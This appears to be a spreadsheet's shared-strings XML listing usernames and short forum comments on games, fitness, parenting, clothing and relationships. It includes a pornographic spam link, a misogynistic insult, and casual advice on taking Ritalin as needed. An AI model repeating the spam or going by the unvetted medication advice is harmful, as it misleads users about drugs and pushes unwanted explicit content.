  <si>
    <t>lilhedgehog87</t>
  </si>
  <si>
    <t>I’m still laughing that was mine and my cousins meetup spot. ‍♀️</t>
  </si>
  <si>
    <t>beneicke_a_hotmail.com</t>
  </si>
  <si>
    <t>UM's best chance to...</t>
  </si>
  <si>
    <t>Aznguyen316</t>
  </si>
  <si>
    <t>I need this more than words can express. This set looks amazing. Definitely in for a bunch of the kits</t>
  </si>
  <si>
    <t>NoMoreSoftwareGore</t>
  </si>
  <si>
    <t>I'd be 4" shorter. :( I'd pretty really bummed out.</t>
  </si>
  <si>
    <t>HELLBENT42</t>
  </si>
  <si>
    <t>That's why you want a sedan as you beloved car.</t>
  </si>
  <si>
    <t>Isoturius</t>
  </si>
  <si>
    <t>Once this team gets on the same page, they’ll be tough to stop.</t>
  </si>
  <si>
    <t>NelvisAlfredo</t>
  </si>
  <si>
    <t>Amazing how well this ad holds up 40 years later</t>
  </si>
  <si>
    <t>urbanphil0s0phy</t>
  </si>
  <si>
    <t>Yeah I got over it. Feel great now. Betrayal hurts, but you've got to not let that hurt your self esteem. Something that really helped me was a past girlfriend that pretty much idolized me. She was more attractive than my wife too so I thought to myself 'gee if this hot chick over here thought I was awesome, who cares what my fat bitch of a wife thinks'.</t>
  </si>
  <si>
    <t>Foreignfig</t>
  </si>
  <si>
    <t>That's what I'm unreasonably obsessed with now, how much for the a, b, &amp; c gown, cap, and tassle packages? They drown you in info for everything else and I don't even see prices or descriptions for that.</t>
  </si>
  <si>
    <t>Issac-Beamer</t>
  </si>
  <si>
    <t>Tall enough to go onto big kid rides at amusement parks</t>
  </si>
  <si>
    <t>Osterconspiracy</t>
  </si>
  <si>
    <t>Generally they are just looking at criminal history and credit, rather than menial jobs.</t>
  </si>
  <si>
    <t>3wooki3</t>
  </si>
  <si>
    <t>I believe SkraperUI will do this. It is a bit of a pain but any of the available tools should help you accomplish this, even if they don't scan subfolders. Basic/brief run-down: Point them at your main rom folder. Run. Point them at each subfolder. Run. Find/replace in subfolder gamelist.xmls to reflect the path. Copy/paste contents into main gamelist.xml.</t>
  </si>
  <si>
    <t>teadunker</t>
  </si>
  <si>
    <t>It's a screwdriver. You use it for driving screws!</t>
  </si>
  <si>
    <t>swtsumrchild</t>
  </si>
  <si>
    <t>oh, sweet guy. the world will miss you.</t>
  </si>
  <si>
    <t>JoshKRoll</t>
  </si>
  <si>
    <t>In general, the waist of unsanforized jeans will stretch back to, or close to, raw measurements with wear. The thighs will not stretch much after the jeans have been soaked/shrunk. Have you soaked these jeans, yet? If they are too small pre-soak, you're SOL and should sell them.</t>
  </si>
  <si>
    <t>_ERR0R__</t>
  </si>
  <si>
    <t>You are no longer able to reply to this conversation</t>
  </si>
  <si>
    <t>daemonwind</t>
  </si>
  <si>
    <t>Starfleet HQ is in San Francisco, the President's office is in Paris.</t>
  </si>
  <si>
    <t>MartCube</t>
  </si>
  <si>
    <t>Comedies would be a better comparison, some fantastic comedies get a lot of 5/10’s and 6/10’s.</t>
  </si>
  <si>
    <t>oaknutjohn</t>
  </si>
  <si>
    <t>This was really inspirational to me! I didn't finish it before o had to return it but there was still so much to mull over.</t>
  </si>
  <si>
    <t>kur1j</t>
  </si>
  <si>
    <t>Auburn also plays UF in the regular season...more than likely UF or UGA coming from the east...they will have to play both...twice....</t>
  </si>
  <si>
    <t>ResolvelutionTension</t>
  </si>
  <si>
    <t>More bad advertising on plastic straws covered with plastic and paper</t>
  </si>
  <si>
    <t>Laughing__Man_</t>
  </si>
  <si>
    <t>Not true. That ONLY applies for the Insider Self refunds.</t>
  </si>
  <si>
    <t>burmo1</t>
  </si>
  <si>
    <t>The meme is nice, but the emoji is not</t>
  </si>
  <si>
    <t>Shallbecomeabat</t>
  </si>
  <si>
    <t>Its boring and on the nose casting, plus he is way way skinny now. I prefer him for Riddler, just because thats such a “wait what?!” choice, which I end up liking almost always (Eisenlex or Hardy Bane for example).</t>
  </si>
  <si>
    <t>neko_1</t>
  </si>
  <si>
    <t>He is the closest thing to alonso. I like drivers who are fiery and causes a lot of drama.</t>
  </si>
  <si>
    <t>SheiBataa</t>
  </si>
  <si>
    <t>Theres a difference between teaching manners and being petty</t>
  </si>
  <si>
    <t>CompleatFailyour</t>
  </si>
  <si>
    <t>Maybe he doesn’t know. Maybe he took the job thinking he’d get an opportunity to compete and they’re taking away his players and despite all that he’s resolved to go out and try and win. I’m afraid he might just be a sacrificial lamb.</t>
  </si>
  <si>
    <t>Joe</t>
  </si>
  <si>
    <t>Cast iron and jarrah restored vintage set freshly painted in very good condition. Table dimensions width 95cm and depth 50cm</t>
  </si>
  <si>
    <t>ShouldBeWorking3</t>
  </si>
  <si>
    <t>liladvicebunny, you live up to your username! I appreciate your well thought out and helpful response. I'm doing my best to understand her needs and wishes. I'm not 100% clear on what they are right now, and I'm hoping that counselling helps bring that to light - for better, or worse. Insofar as working on myself, those were words that I needed to hear. Therapy has been going well, and feels productive. I've been bringing up my current bout of depression, and I think we're taking a couple concrete steps towards feeling better. That last sentence in that paragraph wrecked me, even though I know it's the absolute best thing I can/ should do for myself. I'll be sure to ask her some more about her interests, but I think at this point she's not super interested in talking to me, just yet. Again, thank you so much for your input and advice! I'll be sure to take all of it and use it to the best of my ability to repair my relationship with my wife.</t>
  </si>
  <si>
    <t>JaderedWulf</t>
  </si>
  <si>
    <t>In those days you could pop up hungover after a party, and it was considered a cool look. I love it.</t>
  </si>
  <si>
    <t>an-nym-us</t>
  </si>
  <si>
    <t>Like everyone else says, DO NOT BRING SH TOOLS TO SCHOOL. I've never done it, but I feel like it would be just more added stress for you, constantly worrying about being caught.</t>
  </si>
  <si>
    <t>z0mbies4U</t>
  </si>
  <si>
    <t>I gave my normal shovel to &gt;!Goriya for the boomerang!&lt; a while a go because I was expecting to get the Deluxe Shovel later on, but the shopkeeper still hasn't put it up for sale. All that is for sale right now is the Shield, 3 Hearts, Arrows, Bombs, and Chamber Stone. I'm decently far into the game, since I have beaten the sixth dungeon, so I'm just wondering if he sells the deluxe shovel later on into the game or if I needed the normal shovel and won't have a shovel for the rest of my save file...</t>
  </si>
  <si>
    <t>jumpnshout5</t>
  </si>
  <si>
    <t>Just to update on our EI assessment- it went exactly as expected. They are concerned about her speech development, but since her understanding is so advanced, they weren’t *that* concerned. Since she scored so well in everything else, she didn’t qualify for any services at this time. They are going to come back out in 3 months and check on her speech again and see if there has been any progress. I’m guessing at that point if she hasn’t made any progress, she might qualify in the single delay category. I did ask her about the single syllable “words” and she said as long as they are used in context, LO (little one) knows what she’s saying and as long as we understand what she’s trying to say, they do count as words. She said it isn’t typical but it does count for now. She also prompted LO (little one) for a word to test her, so I asked if that counted as a word and she said yes 🤷🏻‍♀️</t>
  </si>
  <si>
    <t>KatinMazniv471</t>
  </si>
  <si>
    <t>I think that you should get your ass off Reddit</t>
  </si>
  <si>
    <t>Researcher</t>
  </si>
  <si>
    <t>There were four different styles of NID Field Grade Guns. As originally introduced in 1926 they looked like this -- A year or two in they added the stars to the Field Grade receivers -- For 1935, they dropped the cocking indicators, went to border engraving on the receiver and went to a fuller stock with the nicest amount of checkering to grace a Field Grade gun -- After WW-II they dropped the border engraving on the receivers and reverted to the earlier style (cheaper) checkering --</t>
  </si>
  <si>
    <t>alevelphysical</t>
  </si>
  <si>
    <t>afternoon, may someone help me answere I am very sad and cant c0nce0trATe becoz my gf broke up w me ;(((( can some0ne help me w this question ''sdhow dat the specifc charge of a nucleus of the isotope uranium 238 is approximately 0.4 times the specific charge of a proton. Thanks a lot anyone whop replies will get qa surprise on theitr snapchat ;P</t>
  </si>
  <si>
    <t>roslyn_182</t>
  </si>
  <si>
    <t>I'm on 2 months clean and hope this will last. The hardest part is getting out of the routine. Good luck!</t>
  </si>
  <si>
    <t>Please ignore this message if it does not apply to you. Check out r/NBA2kTeamUp, our subreddit dedicated to Park and Pro-Am teammate finding! *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/NBA2k) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Rententee</t>
  </si>
  <si>
    <t>What's the dangerous part exactly?</t>
  </si>
  <si>
    <t>jiroizumi</t>
  </si>
  <si>
    <t>A little speed run of the beginning to the first boss I can’t wait to speedrun the full game</t>
  </si>
  <si>
    <t>Yoyocuber</t>
  </si>
  <si>
    <t>Funky af, your deadlift is extremely good compared to your squat. Maybe check weak points and do either Accessories or modify your squat. Weaker quads - Front Squat Instability/knees caving - Glute medius strengthening Knee weakness - Fix your form, recovery, diet, or take a short break and work on knee strengthening I highly doubt your hamstrings and glutes/back are weak considering your deadlift is much higher. I would recommend front squat and make sure you’re doing deep for your squats. Also use bounce when testing 1RPM (quick eccentric, as if almost falling so your stretch reflect bounced you back). This takes a while to find the perfect sweet spot for how fast to drop and knowing if you can handle the weight at the bottom. It’s easier for me to do ATG than slower eccentric to just barely Knees past hip crease. The bounce really does help.</t>
  </si>
  <si>
    <t>PrinceofWrath</t>
  </si>
  <si>
    <t>The wholesome level is over nine thousaaaaaand!!!</t>
  </si>
  <si>
    <t>Pikachu62999328</t>
  </si>
  <si>
    <t>Not putting in effort to certain things they normally would; capitalisation, apostrophes... OP... you ok man?</t>
  </si>
  <si>
    <t>Carlene</t>
  </si>
  <si>
    <t>HOVERBOARD DOES NOT COME WITH ORIGINAL CHARGER. PICK UP OR POSTAGE</t>
  </si>
  <si>
    <t>lightiggy</t>
  </si>
  <si>
    <t>My Face Will Be the Last Thing You Ever See</t>
  </si>
  <si>
    <t>Safest_Anon</t>
  </si>
  <si>
    <t>Well I am from Europe but I’ve heard it’s pretty popular there.</t>
  </si>
  <si>
    <t>martzquinn</t>
  </si>
  <si>
    <t>might be kinda basic but smoking. at least personally, i hate the smell, i dont want to be around people who have just smoked, and it's so weird to me that people still do it and start doing it because it looks cool to them. it's so wrong on so many levels.</t>
  </si>
  <si>
    <t>bertaww60</t>
  </si>
  <si>
    <t>Hot sexy porn projects, daily updates http://croqporn.alypics.com/?elaine nasty young porn how to view porn free uncensored xxx porn does porn make u cum faster best user submitted homemade porn</t>
  </si>
  <si>
    <t>&gt;9 days left &gt;no boost child. period. &gt;get shit all for tokens I don't think I'm going to make it. It's looking like no Bathory for me. I think I may need a hug. &gt;&gt;266014113 And I can pretty much guarantee we'll get none of them. Only reason we got the 3 succubi are because they're main characters, and Neamhain because she has a skill specifically meant for Rita.</t>
  </si>
  <si>
    <t>thejezzajc</t>
  </si>
  <si>
    <t>Whilst none of the jobs may be your dream job, which is most likely to help you get to your dream job, aiming any of them? Think a bit medium to long term - five years from now, which job will help you most get to where you want to be then?</t>
  </si>
  <si>
    <t>What are the best suplements for gains someone should take? Beginner here, 1,79m 18 years old 78Kg.</t>
  </si>
  <si>
    <t>nightcloudsky</t>
  </si>
  <si>
    <t>it is everywhere on r/politics one of the biggest subs on reddit, also everywhere in leftist subreddit as well. Sorry if you are a little bit ignorant on this issue.</t>
  </si>
  <si>
    <t>SubstantialBiscuit</t>
  </si>
  <si>
    <t>Hundred times this. It was a first piece of fiction that didn't treat me like I was a kid. I saw it first time on one of the main polish TV stations back in 1995 or so (I think I was 5 or 6). Was equal parts disturbed and enchanted by it. Re-watched it 15 years later when I went to uni. It was even better. Now a decade has past, it might be time to re-watch it again. Now that I think of it, it has to be my favorite piece of fiction of all time. Thanks for reminding me!</t>
  </si>
  <si>
    <t>satansoveries-</t>
  </si>
  <si>
    <t>it’s weird for me though, i often get almost too much sleep, my body is used to sleeping at least nine to ten hours, yet i’m always tired and if i get anything like seven or eight hours of sleep, i get so tired throughout the day i can’t even think. i’m homeschooled so i can wake up whenever i want as long it’s not super late, so it’s gotten to the point where i go to sleep at two (am) and wake up at twelve or one (pm)...</t>
  </si>
  <si>
    <t>BootyWhiteMan</t>
  </si>
  <si>
    <t>Redditor DonavanFreberg has started a GoFundMe. You may remember Donavan Freberg as the kid who had a report due on space from the Encyclopedia Britannica commercials. Let's show him some love and good vibes.</t>
  </si>
  <si>
    <t>Curlysar</t>
  </si>
  <si>
    <t>That sounds so good. Glad it was worth the visit.</t>
  </si>
  <si>
    <t>ambivilant</t>
  </si>
  <si>
    <t>Congrats on not knowing what fascism is!</t>
  </si>
  <si>
    <t>theLucror</t>
  </si>
  <si>
    <t>Snyder has entered the chat</t>
  </si>
  <si>
    <t>TheRealJanSanono</t>
  </si>
  <si>
    <t>One can only hope this reaches the same heights as critically acclaimed New Zealand tv film ‘the kick’</t>
  </si>
  <si>
    <t>&gt;&gt;68640426 Based on plot relevance, or on the whims of the jump maker?</t>
  </si>
  <si>
    <t>monstimal</t>
  </si>
  <si>
    <t>&gt; How can this be a controversy now? Racism is having a comeback. I blame Twitter</t>
  </si>
  <si>
    <t>Diogenes81</t>
  </si>
  <si>
    <t>Ya my parents are , ma is half way there anyway I love her but she ruined me she didn’t raise me , well dear old da he’s a cruel narcissistt possibly more than that . But the hatred mellows with age . It’s civil these days . But I don’t forgive them . Nope</t>
  </si>
  <si>
    <t>EazyMac23</t>
  </si>
  <si>
    <t>So because Sony also decided to start milking their customers it’s alright?</t>
  </si>
  <si>
    <t>fecal_____fingers</t>
  </si>
  <si>
    <t>A perfect example of Insider Threat. The guy wasn't even a traitor - he just let Six have unauthorized access in exchange for sex. Ironically, I would think the Cylons would have figured out how to hack an airgapped system (also rendering Galactica vulnerable)... but we'll let that slide.</t>
  </si>
  <si>
    <t>ieya404</t>
  </si>
  <si>
    <t>Am mostly aware of that one as I've seen it on the back of the bus that goes there :) Any and all sorts of place names are interesting to include I think - shows what a fascinatingly varied history we have here.</t>
  </si>
  <si>
    <t>erin333</t>
  </si>
  <si>
    <t>It says I received $20.00 donation (Gross), but the Fee was a little over a dollar, and then it says Net $18.something. Did I receive the Gross $20.00 and the donor payed the fee? Or did the donor pay the Gross $20.00, no fee, and I payed the fee, and was left with the $18.something Net? What did I receive? What do I file on my taxes as my income? The Gross $20? Or the Net (after fee)? Can't figure out if that was my fee or theirs.</t>
  </si>
  <si>
    <t>ecmcdonald21x</t>
  </si>
  <si>
    <t>I just need to rant for a second. Everyone told me I’d “bounce back” from pregnancy quickly because I’m really young and this is my first baby, but it’s almost been four months and I’m no where near normal. My stomach is like striped pizza dough and my hair is falling out and (tmi) I’m not the same at all “down there”. Having a kid at nineteen wasn’t part of my five year plan. I wanted to go to four year college and party with my friends and now that’s never gonna happen. I love my daughter so much and I don’t regret having her, but it feels like my life is falling apart! My body looks about thirty years older and now I’m either working or at home with the baby 24/7. Also I’ve been trying to see a psychiatrist to get back on antidepressants since my daughter was a month old and they never answer the phone!!! I’m at my wit’s end and I feel so bad about myself. Can anyone else relate? How do I get past this and, at the very least, get my old body back?</t>
  </si>
  <si>
    <t>Skyslimitations</t>
  </si>
  <si>
    <t>Thanks Y’all</t>
  </si>
  <si>
    <t>smapattack</t>
  </si>
  <si>
    <t>Hey, all. I'm making a custom stamp for work which requires me to send in an illustrator file with the image placed on it to this stamp company. I've sent this to the custom stamp maker but they keep telling me to embed the png. I've barely used Illustrator and I'm not sure how to do that and their support team is for taking orders only so they can't help. How do I embed the image so that I can stop ripping my hair out over this? I've already placed the stamp image, so if possible I don't want to start again...</t>
  </si>
  <si>
    <t>kirabera</t>
  </si>
  <si>
    <t>Try [this one](https://www.reddit.com/r/TeraOnline/comments/9epjba/saabis_awakeningapex_10_slayer_guide/) although I don't know how updated it is.</t>
  </si>
  <si>
    <t>Mongoose</t>
  </si>
  <si>
    <t>Glad we have some people running for office that cares about our Native Buffalo. Just goes to show you all Liberals aren't stupid..</t>
  </si>
  <si>
    <t>vyers07</t>
  </si>
  <si>
    <t>Lucky I dont have the Disaster DLC. For water drained easily, you could put morr water source along the river?</t>
  </si>
  <si>
    <t>Zaniabell</t>
  </si>
  <si>
    <t>The problem with using the deep web is that it gets you more attention from the govt</t>
  </si>
  <si>
    <t>KaptainFlakes</t>
  </si>
  <si>
    <t>Hot damn! That's insane.</t>
  </si>
  <si>
    <t>absaoke</t>
  </si>
  <si>
    <t>Sounds great thanks for sharing!</t>
  </si>
  <si>
    <t>tvtb</t>
  </si>
  <si>
    <t>I imagine that woman screamed at the top of her lungs “MOVE OUT THE WAY” twice before she jumped out</t>
  </si>
  <si>
    <t>AwfulAtEverything</t>
  </si>
  <si>
    <t>I've looked in most places, but the information is either not clear or not complete. In your opinion, what's your perfect list of enchantments for everything that can be enchanted?</t>
  </si>
  <si>
    <t>Toastbae</t>
  </si>
  <si>
    <t>I cut off my nipples to prove this wrong</t>
  </si>
  <si>
    <t>Torun__</t>
  </si>
  <si>
    <t>I dont know stuck in the same patterna you know worked there since i was 25</t>
  </si>
  <si>
    <t>StingerRPG</t>
  </si>
  <si>
    <t>Honestly with our CE dedicating to cover their ass I don't think they really need to care about said public image. The usual 1600 press conference will still be a joke and full of lies(It feels like listening to multiple Todd Howards) plus their reputation has went down the shitter. Not even in 2014 their image was this horrible. They're free to do whatever the fuck they please and the top brass will spew some bullshit to deal with the press.</t>
  </si>
  <si>
    <t>burn_piano_island</t>
  </si>
  <si>
    <t>Hello! Thanks for participating in /r/Seattle! Your submission/comment was removed. Please check the rules on the sidebar of our subreddit and the [Rules wiki](https://www.reddit.com/r/Seattle/wiki/rules). The reason for the removal is: &gt; Rule #3: **Missing person/pets** and **lost or stolen property**: There are strict rules relating to these types of posts. Please refer to this [wiki topic](/r/Seattle/wiki/missing) for details. It's possible that this removal was a mistake! If you think it was, please **[click here to message the Moderators](https://www.reddit.com/message/compose?to=%2Fr%2FSeattle)**.</t>
  </si>
  <si>
    <t>bliffskit</t>
  </si>
  <si>
    <t>Whatever you do just don’t settle for a trend (tribal, bird silhouettes, infinity symbols) as they never age well. What’s meaningful to you?</t>
  </si>
  <si>
    <t>8VBQ-Y5AG-8XU9-567UM</t>
  </si>
  <si>
    <t>ELI5: Is it a common misconception that Charlie Sheen was a part of The Friends' (the Warner TV show) main cast?</t>
  </si>
  <si>
    <t>PM_ME_DNA</t>
  </si>
  <si>
    <t>It's because you put Skilling/ PvM exclusive content in the wildy. Good content is Elder Chaos Druids/Robes, Rings, Revs. Bad content is Dragon Pick. The biggest problem why Skillers and PvMers don't just "fight back" is because if you're facing someone equally skilled, you're a huge disadvantage. In other games, you can skill in PvP mode without losing your PvP capabilities.</t>
  </si>
  <si>
    <t>BioregenerativeLamp</t>
  </si>
  <si>
    <t>jesus just wait a year. For a "mature" girl you sure drowned yourself in a glass of water. There's a million things to do before than that, and you will have so many years to find a compatible person. Also game idea: Drink a shot everytime she says minor.</t>
  </si>
  <si>
    <t>infamous_p</t>
  </si>
  <si>
    <t>Whatever for? JDM life.</t>
  </si>
  <si>
    <t>TheBetrayedMighty</t>
  </si>
  <si>
    <t>On top of that ww2 had nearly the best microtransaction in history of COD which isn't an accomplishment but still</t>
  </si>
  <si>
    <t>notorious-bil</t>
  </si>
  <si>
    <t>Because now if you don’t agree with climate change you hate special needs kids.</t>
  </si>
  <si>
    <t>piece_of_shit-2</t>
  </si>
  <si>
    <t>By your logic, If you're in a Room wich someone is having sex with someone Else, you are also having sex.</t>
  </si>
  <si>
    <t>gamer123098</t>
  </si>
  <si>
    <t>Place is a madhouse, feels like being alone but don't go too far or else you won't know where to go.</t>
  </si>
  <si>
    <t>PIMPeverlasting</t>
  </si>
  <si>
    <t>Sure! How would you like it cooked? (Already knowing what’s coming) “Well done” Of course you will! Is it okay if we butterfly it? “What does that mean?” A cow didn’t die for you to disrespect it like this. What a waste of fucking money. Her boyfriend got the same exact thing too, I should add.</t>
  </si>
  <si>
    <t>Rednekognize</t>
  </si>
  <si>
    <t>Holycow: Why? Same reason I dont like the Yankees or the Patriots. Just dont like em. Zipster: People hate corporate sponsorships. What’s funny is op probably doesn’t realize C9 is one of the highest, if not the highest valued esports company out there. Thats not why I dont like MO but you keep laughing at yourself if it makes ya feel batter. C9 isnt the team I wanted to see win but they beat Method so I am glad.</t>
  </si>
  <si>
    <t>boxermama1985</t>
  </si>
  <si>
    <t>When will the points show up? Last time I ordered they showed up when the items shipped but now my order has shipped and I still don’t have the points added? Just trying to decide when to contact customer service</t>
  </si>
  <si>
    <t>atomicebo</t>
  </si>
  <si>
    <t>Exactly the same as it is now.</t>
  </si>
  <si>
    <t>DanNorse</t>
  </si>
  <si>
    <t>What exactly do you mean by this?</t>
  </si>
  <si>
    <t>WestGanjaHunter</t>
  </si>
  <si>
    <t>Do you realise each question gets more in depth? The first one is an ice breaker haha Wtf is Tous? XD</t>
  </si>
  <si>
    <t>hyperdefiance</t>
  </si>
  <si>
    <t>You can recruit Gondawara to be one of your "Summons"</t>
  </si>
  <si>
    <t>kitchenspoon</t>
  </si>
  <si>
    <t>I’m not doctor but having been through various therapists and psychologist, I’ve tried everything from Diazepam, Sertraline through to Ritalin/Adderal. Neither will get you where you want I’m afraid. Ritalin for me is something I use when I need to focus on work projects as I struggle to maintain focus on a single task. Take it when you need it, not continuously. It’s a. healthier option as well.</t>
  </si>
  <si>
    <t>1apostolios1</t>
  </si>
  <si>
    <t>Goodboye is a good reason!</t>
  </si>
  <si>
    <t>stirringbaton87</t>
  </si>
  <si>
    <t>If there was pins on the deck then it's an out of range where the pin is slid over and it hits the table as the table goes down to pick up the pins. The table will be forced back up but the gate will stay down</t>
  </si>
  <si>
    <t>disisathrowaway5309</t>
  </si>
  <si>
    <t>Just to echo, Bakers will 100% get you an A&amp;P if you're an experienced maintainer since they just teach the test. That said, I think that you're shortchanging yourself a lot as a mechanic because you will learn almost nothing from them. Also, not a single Air Force AFSC teaches you even 1/4 of the material required to earn an A&amp;P. If you want to actually learn anything, go to AFVEC and look up their AF COOL FAQ and A&amp;P FAQ. There is an online course you have to enroll in that they allow you 6 months to do. Basically you read the General, Airframe and Powerplant handbooks which are hundreds of pages a piece and take online tests on them. You'll learn a lot, but it will be more difficult and time consuming for you to get your A&amp;P.</t>
  </si>
  <si>
    <t>e4e16vmC0v3f</t>
  </si>
  <si>
    <t>give dva and Winston a relatively small damage reduction % for short time after activating their movement abilities</t>
  </si>
  <si>
    <t>jake4448</t>
  </si>
  <si>
    <t>Many... many hours later after redownloding the game this worked! Thank you very much</t>
  </si>
  <si>
    <t>DarkMatter00111</t>
  </si>
  <si>
    <t>Because I was too lazy to go to work, cause it's too hot and I wanted to play pc games.</t>
  </si>
  <si>
    <t>Please message me?</t>
  </si>
  <si>
    <t>blondambition</t>
  </si>
  <si>
    <t>ThighsofGlory : cherryl taggart: I remember the Love's Baby stuff. We used to laugh at it, because it was just baby stuff in gussied up packages. Baby powder, baby wash, baby shampoo, all of it was just repacked and no one under the age of 21 wanted to be thought of as babyish. It was always on sale, because our crowd was buying Charlie, or Rive Gauche, and musk based stuff. We wanted to be grown, nobody would want to hang with creeps that like baby powder smell. Jean Nate, thankyouverymuch. Oh god, my MIL used to drown herself in that shiat. I always hated letting her hold my son because I'd get him back reeking of that cheap swill.</t>
  </si>
  <si>
    <t>EbberNor</t>
  </si>
  <si>
    <t>Comparing actual mechanics that are at best 2-3 years away to boss monsters nobody would like to play against lol.</t>
  </si>
  <si>
    <t>StevePod</t>
  </si>
  <si>
    <t>continue soaking it will come off</t>
  </si>
  <si>
    <t>elizubeth</t>
  </si>
  <si>
    <t>I’m a solo que player and my teammates are usually around the same rank as the killer. Matches take a pretty long time but somehow I’m still depipping every game D:</t>
  </si>
  <si>
    <t>BillieRubenCamGirl</t>
  </si>
  <si>
    <t>you're so welcome!</t>
  </si>
  <si>
    <t>Gabe9000__</t>
  </si>
  <si>
    <t>Lol a quest owner so I won't be getting that update z but for those who are..be careful lol</t>
  </si>
  <si>
    <t>lightlystarched</t>
  </si>
  <si>
    <t>Isn't this just a cardboard box?</t>
  </si>
  <si>
    <t>JokeSmuggler</t>
  </si>
  <si>
    <t>Kylote said: ↑ I was getting a little concerned that no one was going to spell Relient K correctly Click to expand... Can’t remember if I did but autocorrect is not your friend on that one...also I recently saw somebody driving a real Reliant K car and it brought me back to 2000</t>
  </si>
  <si>
    <t>kamikaziboarder</t>
  </si>
  <si>
    <t>I didn’t say anything about the gif. I was talking about the trails near where I grew up...</t>
  </si>
  <si>
    <t>mostessmoey</t>
  </si>
  <si>
    <t>I try to tell my kids, bio and work: what other people do has no effect on you. Telling me about how bad someone else is does not make you good.</t>
  </si>
  <si>
    <t>Comebacktryhard</t>
  </si>
  <si>
    <t>It sucks to be alone. I never had a girl in my 21 years of existence. Somehow I became numb. Really had a crush on one girl approached her and screwed the encounter. I think my life is fucking me up. When I am to hit rock bottom there is always that pulls me up.</t>
  </si>
  <si>
    <t>itsalllintheusername</t>
  </si>
  <si>
    <t>Yea no reason to make it about race...unless of course it was about race</t>
  </si>
  <si>
    <t>Hira L</t>
  </si>
  <si>
    <t>" Great web and helpful staff and great price. "</t>
  </si>
  <si>
    <t>iamasecretthrowaway</t>
  </si>
  <si>
    <t>So, we actually don't really know. We know that tgeres a flood of adrenaline that causes all the same symptoms as you'd get if there were actually a threat - increased heart rate, increased breathing rate, sweating, even nausea. But we dont really know why some people panic attacks and others don't. A recent study of random panic attacks (ie. Attacks that aren't triggered by a phobia or stress or whatever) actually found that measurable symptoms started about an hour before the panic attack. Subjects' breathing increased or became irregular, they started sweating, their hearts started beating faster or more irregularly, etc, but not so much that it was noticeable. They all reported the panic attack came completely out of the blue. And we dont really know why. We dont know what triggers the initial changes that eventually culminated in a panic attack.</t>
  </si>
  <si>
    <t>Reminder to commenters: [Don't be a dunce!](https://media2.giphy.com/media/26gswNS2Dm4q6600g/giphy.gif) Share kindness, support and compassion, [not criticism.](https://media0.giphy.com/media/tZpGRRMUoXgeQ/giphy.gif) We want OP to feel loved, and [not in a tough way.](https://media.giphy.com/media/xT5LMq2CgHiqqY4IXC/giphy.gif) For more helpful information please hit up [our beautiful rules wiki!](http://www.reddit.com/r/breakingmom/wiki/) Reminder to all: watch out for a [creepy pedo posing as an OT/speech therapist](https://www.reddit.com/r/breakingmom/comments/8ccqqi/disgusting_pedophile_troll_posing_as_otspeech/) giving fucked-up potty-training advice, and don't sweat it if your post gets 1 or 2 [instant downvotes.](http://i.imgur.com/PZtQb.gif) You didn't do anything wrong, we just have [asshole lurkers](https://i.imgur.com/IwU9r3E.gif)/[downvote bots](https://media2.giphy.com/media/nT2rEuE44E0iA/giphy.gif) stalking our /new queue. Help a BroMo out and [give her an upvote](https://i.imgur.com/Y60Mbxv.gif), ok? *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/breakingmom) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>&gt;&gt;8667339 I hear you OP. I've been sinking a lot of time into the past week, but have come to the same conclusion. I would like to be able to play it minimally, but the only way I've ever enjoyed the game in the past is by going big dick. Even though I work from home, and could easily invest 8+ hours a day into the game if I wanted, I just can't allow myself to do that like I used to; back when I was still pretty blue-pilled.</t>
  </si>
  <si>
    <t>ViRus01V01</t>
  </si>
  <si>
    <t>In 1 month you will get bored of the game .</t>
  </si>
  <si>
    <t>&gt;&gt;10991128 &gt;8▶ &gt;&gt;10991212 &gt;&gt;10991225 &gt;&gt;10991273 &gt; &gt;&gt;10991117 falling for the bait</t>
  </si>
  <si>
    <t>64robots</t>
  </si>
  <si>
    <t>I guess youre perfect then, got ya.</t>
  </si>
  <si>
    <t>SnoopDodgy</t>
  </si>
  <si>
    <t>Apple Watch.</t>
  </si>
  <si>
    <t>TattedUpSimba</t>
  </si>
  <si>
    <t>So I have a pair of N&amp;F left hand twill easy guys. They fit great except below the knee. I've done some research about tapering, and heard that I need a good tailor and I should do it from the inseam. On one post, I saw it meantioned that tapering from the inseam can cause the jeans to twist in an unusual way. Obviously, I'm sure this is dependant upon how much you taper your jeans. However, I can't find anything that says how much is too much of a taper. As of now, I just want to taper them from the knee down and and end up with a 7 inch leg opening (about an inch smaller than it is now). Any advice on if this is too much or any other advice about tapering?</t>
  </si>
  <si>
    <t>hoyt9912</t>
  </si>
  <si>
    <t>My god. Children who can’t even speak yet are smarter than him. He shouldn’t have hosted the apprentice, he should have been the control variable for a show called “Are you Smarter than a Newborn?”</t>
  </si>
  <si>
    <t>MsMargo</t>
  </si>
  <si>
    <t>Just for reference, here's the tally from the last time this got asked (https://www.reddit.com/r/Tiki/comments/aznjr1/what_are_your_top_4_tiki_drinks/) Votes|Drink ---|--- 10|Mai Tai 5|Navy Grog 5|Zombie 4|Jungle Bird 3|Lapu Lapu 3|Saturn 3|Singapore Sling 2|Black Magic 2|Missionary's Downfall 2|Painkiller 2|Rum Barrel 2|Sidewinder’s Fang 1|Banana Daiquiri 1|Cobra’s Fang 1|Dr. Funk 1|Fog Cutter 1|Headhunter 1|Hurricane 1|Jet Pilot 1|King Kamehameha 1|PB2Y2 1|Pearl Diver 1|Ray’s Mistake 1|Space Pilot 1|Suffering Bastard 1|Test Pilot 1|Ti' Punch 1|Tropical Itch</t>
  </si>
  <si>
    <t>justin0434</t>
  </si>
  <si>
    <t>The PC streaming feature Oculus told VD to remove was within the native game itself. There's a sideloading app that re-enables the PCVR feature once bought.</t>
  </si>
  <si>
    <t>zoobyshoe</t>
  </si>
  <si>
    <t>Nah, I just want to know which trashy douchebag’s channel I should block</t>
  </si>
  <si>
    <t>melbbbmelb</t>
  </si>
  <si>
    <t>For very good reason...</t>
  </si>
  <si>
    <t>Miskav</t>
  </si>
  <si>
    <t>You'd pretty much die on impact so I don't see the issue really. Probably one of the least painful ways to die.</t>
  </si>
  <si>
    <t>dogsent</t>
  </si>
  <si>
    <t>In front of a public office, like the DMV? Should it be open to every vendor that wants to set up a table or booth? How about creating a gauntlet of competing vendors outside the entrance of every public office?</t>
  </si>
  <si>
    <t>&gt;&gt;810136031 rolled the dice</t>
  </si>
  <si>
    <t>redandvidya</t>
  </si>
  <si>
    <t>Ironically I’m from the Philippines</t>
